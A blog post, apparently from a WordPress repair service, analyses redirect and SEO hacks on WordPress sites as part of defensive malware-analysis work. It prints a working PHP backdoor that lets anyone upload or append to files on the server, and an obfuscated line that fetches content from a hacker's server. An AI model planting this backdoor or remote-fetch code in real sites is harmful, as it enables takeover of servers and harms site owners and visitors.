WordPress Doctor has been recovering sites that have suffered malware tampering, and we would like to explain what kind of redirect hacks (site tampering in which users who access the site are directed to Chinese sites, security sites, etc. without permission) that many sites in particular have been affected by recently. I would like to explain what the code looks like and how it works.
Prerequisites Hackers who seize WordPress administrator privileges
Hackers first take over WordPress administrator privileges by using the following methods.
Entering passwords into the login screen by brute force and repeatedly performing login enforcement to gain administrator privileges (automated by software).
Take advantage of vulnerabilities in plug-ins, themes, and WordPress itself to gain administrator privileges.
Takeover of administrator privileges by taking advantage of a flaw in the wp-config.php setting (e.g., unique key for authentication not set).
WordPress has a function to change files from the administration screen, and this function can be used to embed malicious code into the site.
Tampering that redirects users to a page on a different domain no matter which page they access.
In order to redirect users who access various pages, such as those accessed via search engines, hackers must plant redirection code in files that are loaded by WordPress.
Typical files included in WordPress that are always loaded when the site is displayed include index.php, wp-config.php, and header.php and footer.php included in the theme, which are the files with the highest probability of being tampered with by hackers. The most likely files to be tampered with by hackers are
The image above is a capture of the actual tampering code embedded in wp-config.php.
You can see that the @include instruction loads and executes some file from another location. In many cases, malware code is obfuscated in this way so that the contents of the process cannot be understood.
Place a file on your site that allows you to upload arbitrary files to the server
The redirect hacks that have become popular in recent years always include files with the following code in the server. It can be disguised as a plugin or placed in the wp-content folder in a file called wpcsesapps.php.
if (isset($_POST['upload'])){ if ($_POST['upload']=='1'){ $uploadfile = $_POST['path']. $_FILES['uploadfile']['name']; if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)) {echo 'ok';} else {echo $_FILES['uploadfile']['error'];} } if ($_POST['upload']=='2'){ $fp=fopen($_POST['path'],'a'); fwrite($fp,"\r\n"); fwrite($fp, $_POST['uploadfile']); fclose($fp); echo 'ok'; } } else {header('Location: . /... /');}
This code is very dangerous because it allows any file to be uploaded to the server from the outside, creating a backdoor, a gateway for hackers to tamper with the server.
This file is not obfuscated and cannot be detected by malware scanners that detect obfuscated code.
Embedding code that redirects to a malicious site in every link in the site’s pages
There was also a case of a theme being tampered with by embedding malicious Javascript code in a file called footer.php, which redirects users to a different site the moment they click on a link on any page of the site.
The XXXXXX part is assumed to be an invalid time.
This code plants a fake link that causes the user to jump to a different site for every link contained in the site. It is also a very clever code that prevents this function from being activated for a certain period of time for users who have already been redirected using COOKIE so that it is only activated once every few hours.
Link to another site that has undergone similar tampering with arbitrary keywords
Finally, a common characteristic of this redirect hack is that it also includes a tampering called an SEO hack.
An SEO hack is the exploitation of the mechanism by which search engines bring a site to the top of the search engine results based on the amount of links it has, by secretly embedding a link to a site that contains malicious code into the site without the site’s administrator being aware of it.
To output this link, the hacker embeds the following tampering into the site
XXXXXX is assumed to be illegal.
@file_get_contents(str_rot13("uggc://scrq8.bet/xxxxxxxxx"));
This code retrieves the link list for the SEO hack from the server owned by the hacker in real time, allowing the hacker to set the URL of the site he wants to display in the search engines through the SEO hack at any time he likes.
The list thus obtained is unknowingly output within the tampered site and the search engines pick it up.
Reference Article
WordPress Defacement Recovery: 5000+ List of Hacked WordPress Sites Discovered
How to Detect Redirect Hack Malware?
Please click here to use the plugin created by WordPress Doctor that can detect redirect hack malware
Free WordPress Doctor: Malware Scan Plugin